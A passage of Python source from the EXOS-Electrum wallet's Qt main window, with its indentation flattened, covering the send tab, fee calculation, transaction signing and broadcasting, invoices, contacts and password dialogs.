+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('EXOS transactions are not free. A transaction fee is paid by the sender of the funds. The fee is collected by the staker who forges the block containing the transaction.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed. Transactions with fees less that 0.0001 EXOS will be rejected.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size, in bytes, of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, EXOS-Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 exos might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(True)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # exo/byte feerate
amount = 0 if amount is None else amount * 1000 # exo/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('EXOS Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid EXOS Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
if isinstance(self.wallet, Multisig_Wallet):
parent.close()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of payees in the \'Pay to\' field.'),
_('One payee per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum_exos,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_exos.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
